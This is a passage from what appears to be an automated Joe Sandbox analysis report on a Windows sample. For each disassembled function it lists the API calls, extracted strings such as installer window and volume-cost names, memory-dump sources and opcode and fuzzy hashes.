                                                    • API ID: CriticalSection$CloseEnterFileHandleLeave$ConditionCreateInit_thread_footerVariableWakeWrite
                                                    • String ID: <3[$aix$html$c
                                                    • API String ID: 2030708724-1035274146
                                                    • Opcode ID: 03e123876c288a6aa4bcc644e3764086c792d05d1e112bfe4b7c06a0ccf0999f
                                                    • Instruction ID: 36d6a91bf5a193867c6be48c045a258dd784980b4fe01ccb0fc1623d09a4bd8a
                                                    • Opcode Fuzzy Hash: 03e123876c288a6aa4bcc644e3764086c792d05d1e112bfe4b7c06a0ccf0999f
                                                    • Instruction Fuzzy Hash: 0D618DB0900248DFEB10CF94DC58BDEBBF5FB55708F109519E402AB2D5DBB96A09CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00523BE0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 00523C17
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00523C1F
                                                    • _ValidateLocalCookies.LIBCMT ref: 00523CA8
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00523CD3
                                                    • _ValidateLocalCookies.LIBCMT ref: 00523D28
                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00523D3E
                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00523D53
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
                                                    • String ID: `{5$csm
                                                    • API String ID: 1385549066-992564086
                                                    • Opcode ID: 877fadb79fc3c82a33a927fad4464b999f326b82d2fb8914fdb3fdb2d1d520fb
                                                    • Instruction ID: 04d9aca428d2aa458b5beedc61a3193e1d7a31fec1882b174580de51a917cc03
                                                    • Opcode Fuzzy Hash: 877fadb79fc3c82a33a927fad4464b999f326b82d2fb8914fdb3fdb2d1d520fb
                                                    • Instruction Fuzzy Hash: 01417134A002299BCF10DF68E849AAEBFB5BF86324F148155E9147B3D2DB359E05CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00470330 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 346fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,D13B3340), ref: 004703B9
                                                    • ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000,00001000), ref: 0047042B
                                                    • ReadFile.KERNEL32(?,00000000,00001000,00000000,00000000,?,?,00000000), ref: 004706CC
                                                    • CloseHandle.KERNEL32(?), ref: 0047072A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$Read$CloseCreateHandle
                                                    • String ID: <3[
                                                    • API String ID: 1724936099-3672254634
                                                    • Opcode ID: e4bdafb98206bf9876f8ae9ec297813ba6fd2b143202fb4bc671199aaac7e267
                                                    • Instruction ID: 2a4b33a2584f38b8b91f0ad0c759d7cb08d027c7a0dc6a7baafa297d63d3c204
                                                    • Opcode Fuzzy Hash: e4bdafb98206bf9876f8ae9ec297813ba6fd2b143202fb4bc671199aaac7e267
                                                    • Instruction Fuzzy Hash: B5D19071D01318DBDB20CFA4C958BEEBBB5BF45304F20821EE419AB381D778AA45CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00454260 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 248fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000), ref: 0045434F
                                                    • CloseHandle.KERNEL32(00000000), ref: 00454377
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 004543B9
                                                    • CloseHandle.KERNEL32(?), ref: 0045440E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseFileHandle$CreateWrite
                                                    • String ID: .bat$<3[$EXE$open
                                                    • API String ID: 3602564925-3266170225
                                                    • Opcode ID: bfdf1a2eefca25c42285be23db06b58d8845ea698f91426622d74253b9a105e1
                                                    • Instruction ID: 5288822706d2ccf92fb0869b2f1d286fbf3cb11d90d553792ed1903d2e347be2
                                                    • Opcode Fuzzy Hash: bfdf1a2eefca25c42285be23db06b58d8845ea698f91426622d74253b9a105e1
                                                    • Instruction Fuzzy Hash: 56A1AE30901648DFEB10CFA8CD48B9EBBB4FF45319F148259E805AB292DB749D48CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00495700 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 148libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemDefaultLangID.KERNEL32 ref: 0049573C
                                                    • GetUserDefaultLangID.KERNEL32 ref: 00495749
                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 0049575B
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemDefaultUILanguage), ref: 0049576F
                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00495784
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressDefaultLangProc$LibraryLoadSystemUser
                                                    • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll
                                                    • API String ID: 667524283-3528650308
                                                    • Opcode ID: fdb024d1bee2d34caf9b51d0821e418a8852a913e701ddc0599cdcf104913b89
                                                    • Instruction ID: 2f1538b3933b9d5964379a16a8d7c4bd861395c8b890be4fe72c17403f5ef127
                                                    • Opcode Fuzzy Hash: fdb024d1bee2d34caf9b51d0821e418a8852a913e701ddc0599cdcf104913b89
                                                    • Instruction Fuzzy Hash: 0E41BF70A04701DFCB45EF25D85067ABBE1BFE8315FA1192EE885C3240EB38D959CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004A1450 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 319synchronizationfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000000,?,?,?,?), ref: 004A175A
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    • ResetEvent.KERNEL32(00000000,D13B3340,?,?,00000000,005922FD,000000FF,?,80004005), ref: 004A17EF
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,005922FD,000000FF,?,80004005), ref: 004A180F
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,005922FD,000000FF,?,80004005), ref: 004A181A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: HeapInit_thread_footerObjectSingleWait$AllocateDeleteEventFileFindProcessResetResource
                                                    • String ID: TEST$[mT$tin9999.tmp
                                                    • API String ID: 3248508590-2527398882
                                                    • Opcode ID: 487519d86baef60bff965968b73f7cb334ac9b304ed6503ba77304acec6401ac
                                                    • Instruction ID: ded1a3e76ea5a4f4d8eaa95fb0458a96632a8fb8dc40ec02c27ba65bad269ade
                                                    • Opcode Fuzzy Hash: 487519d86baef60bff965968b73f7cb334ac9b304ed6503ba77304acec6401ac
                                                    • Instruction Fuzzy Hash: 38C1D375900649DFDB14DF68CC04BAEBBB8FF15320F14426EE816AB3A0DB749A04CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0046A1C0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 249registrylibraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,D13B3340), ref: 0046A404
                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 0046A414
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0046A45D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressCloseHandleModuleProc
                                                    • String ID: <;\$Advapi32.dll$RegOpenKeyTransactedW
                                                    • API String ID: 4190037839-1946468692
                                                    • Opcode ID: 5b8ab8276393106f715fd76807c32ede4723b6475081d819982b0c0a8d78dfd4
                                                    • Instruction ID: f5a75aed15a74842a06362dc4d18ac6c99a839bb163d217bf4ecd9e6d37ddac6
                                                    • Opcode Fuzzy Hash: 5b8ab8276393106f715fd76807c32ede4723b6475081d819982b0c0a8d78dfd4
                                                    • Instruction Fuzzy Hash: 64A16B70D00708DFDB14CFA8C959B9EBBF4BF45304F10865AE805AB391EB78A954CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003596A0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 00359785
                                                    • __Init_thread_footer.LIBCMT ref: 003597D0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: </a>$<a href="$<a>$hc$hc
                                                    • API String ID: 1385522511-1797644468
                                                    • Opcode ID: 2e21edfcf3924b96d9a1936da6f149511013ccdcf75bc0d0f7f0537965138a26
                                                    • Instruction ID: 6627db8ad94c6fa3bfeed8194a6ad603cdb64fd830d07ef84c54bbd5fa72c4a7
                                                    • Opcode Fuzzy Hash: 2e21edfcf3924b96d9a1936da6f149511013ccdcf75bc0d0f7f0537965138a26
                                                    • Instruction Fuzzy Hash: 2191B270A00304EFDB05DF68D845FADB7B6FF49315F11461AE815AB2E1EB31A949CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00360EC0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 221libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 00360F61
                                                      • Part of subcall function 00520328: EnterCriticalSection.KERNEL32(00637DCC,?,?,0035ACA7,006389FC,005A5FA0), ref: 00520332
                                                      • Part of subcall function 00520328: LeaveCriticalSection.KERNEL32(00637DCC,?,0035ACA7,006389FC,005A5FA0), ref: 00520365
                                                      • Part of subcall function 00520328: RtlWakeAllConditionVariable.NTDLL ref: 005203DC
                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W), ref: 00360FAA
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00360FB1
                                                    • __Init_thread_footer.LIBCMT ref: 00360FC5
                                                      • Part of subcall function 00520372: EnterCriticalSection.KERNEL32(00637DCC,?,?,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 0052037D
                                                      • Part of subcall function 00520372: LeaveCriticalSection.KERNEL32(00637DCC,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 005203BA
                                                    • GetTempPathW.KERNEL32(00000104,?,D13B3340,?), ref: 00360FF2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterInit_thread_footerLeave$AddressConditionHandleModulePathProcTempVariableWake
                                                    • String ID: GetTempPath2W$Kernel32.dll
                                                    • API String ID: 3676318360-1983778095
                                                    • Opcode ID: 2bdab100c7f8269819ebc1e4534e77de692e3a35114021b07339494aeec88a91
                                                    • Instruction ID: 9b31f1444a20274967905f912331a9f60e23e22e51be0dfc765100b0775cb928
                                                    • Opcode Fuzzy Hash: 2bdab100c7f8269819ebc1e4534e77de692e3a35114021b07339494aeec88a91
                                                    • Instruction Fuzzy Hash: F581D4B1D00208EFDB24DF98DC4AB9EBBB4FB54710F1042A9E505A72D1DB756A44CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004A4960 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 201COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer$HeapProcess
                                                    • String ID: [mT$emT
                                                    • API String ID: 275895251-408856089
                                                    • Opcode ID: bd8b55cf5908c99e9ce5d6dc584a9d34acdf3d6d91027e663f06f7046c8c080b
                                                    • Instruction ID: c6caa7667e2e1c9b3d4176b58b1763862cf113c045c072546523b04ae8d2957a
                                                    • Opcode Fuzzy Hash: bd8b55cf5908c99e9ce5d6dc584a9d34acdf3d6d91027e663f06f7046c8c080b
                                                    • Instruction Fuzzy Hash: 94815B71901209DFDF10CFA8C988B9EBBF5FF99324F148269E914AB391C7B49904DB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00369050 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 151threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetLastError.KERNEL32(0000000E,D13B3340,?,?,00000000,?), ref: 0036908E
                                                    • GetCurrentThreadId.KERNEL32 ref: 003690CF
                                                    • EnterCriticalSection.KERNEL32(0063E7BC), ref: 003690EF
                                                    • LeaveCriticalSection.KERNEL32(0063E7BC), ref: 00369113
                                                    • CreateWindowExW.USER32(00000000,00000000,00000000,0063E7BC,?,80000000,00000000,80000000,00000000,00000000,00000000), ref: 0036916E
                                                      • Part of subcall function 0051FA13: GetProcessHeap.KERNEL32(00000008,00000008,00000000,00495F3E,?,?,?,?,?,?), ref: 0051FA18
                                                      • Part of subcall function 0051FA13: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?), ref: 0051FA1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalHeapSection$AllocCreateCurrentEnterErrorLastLeaveProcessThreadWindow
                                                    • String ID: AXWIN UI Window$Kc
                                                    • API String ID: 213679520-708131849
                                                    • Opcode ID: 2637d9cb892e5ac1257ca4287020e16684127af50bcf11136bc280a887d701d2
                                                    • Instruction ID: ef7869105d92ea39b139a65368c10bdc9b0d89fed744bbb0d569c46e35467568
                                                    • Opcode Fuzzy Hash: 2637d9cb892e5ac1257ca4287020e16684127af50bcf11136bc280a887d701d2
                                                    • Instruction Fuzzy Hash: 8551E675604305AFDB11CF58DD08BAABBF9FF98714F11812AFD14A7280D771A814CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003526E0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0063948C,00000000,D13B3340,00000000,00584033,000000FF,?,D13B3340), ref: 00352853
                                                    • GetLastError.KERNEL32(?,D13B3340), ref: 0035285D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                    • String ID: <Y\$VolumeCostDifference$VolumeCostRequired$VolumeCostVolume$dY\
                                                    • API String ID: 439134102-1117542048
                                                    • Opcode ID: a864668cd8275da4a404885757543bf85b8429f721b8a04e58952ac82683c20c
                                                    • Instruction ID: b35fcf1ca01de8102cfdc7d4010b35f93fa5b056c275033ee5aa912c3715ab93
                                                    • Opcode Fuzzy Hash: a864668cd8275da4a404885757543bf85b8429f721b8a04e58952ac82683c20c
                                                    • Instruction Fuzzy Hash: C551D7B1900619DFDB01CFA4EC09B9E7BF9FB09715F004229D815A7391E7B5A509CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004B35B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 99libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,?), ref: 004B35C0
                                                    • LoadLibraryW.KERNEL32(Shell32.dll), ref: 004B35D3
                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004B35E3
                                                    • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 004B366C
                                                    • SHGetMalloc.SHELL32(?), ref: 004B36AE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressFolderFromLibraryListLoadLocationMallocPathProcSpecial
                                                    • String ID: SHGetSpecialFolderPathW$Shell32.dll
                                                    • API String ID: 2352187698-2988203397
                                                    • Opcode ID: 9663a2d5292275a2955869ef08736245948a773ca0ab9a0c553a06fe385c1eaf
                                                    • Instruction ID: aebc576bb8327bb99b5b8980200f3b041540be6ba795fcc9a94d511d2dc60686
                                                    • Opcode Fuzzy Hash: 9663a2d5292275a2955869ef08736245948a773ca0ab9a0c553a06fe385c1eaf
                                                    • Instruction Fuzzy Hash: EE31D571600701ABDB309F29DC49BA777F5BFD4702F44842EE885873D0EB7599468BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00370050 Relevance: 12.1, APIs: 8, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 0037007A
                                                    • GetWindow.USER32(?,00000005), ref: 00370087
                                                    • GetWindow.USER32(00000000,00000002), ref: 003701C2
                                                      • Part of subcall function 0036FED0: GetWindowRect.USER32(?,?), ref: 0036FEFC
                                                      • Part of subcall function 0036FED0: GetWindowRect.USER32(?,?), ref: 0036FF0C
                                                    • GetWindowRect.USER32(?,?), ref: 0037011B
                                                    • GetWindowRect.USER32(00000000,?), ref: 0037012B
                                                    • GetWindowRect.USER32(00000000,?), ref: 00370145
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$Rect
                                                    • String ID:
                                                    • API String ID: 3200805268-0
                                                    • Opcode ID: 51520fbb3bc9b7593171b1527b5568d8c633cb364bfdf6f09dcf5071573fc065
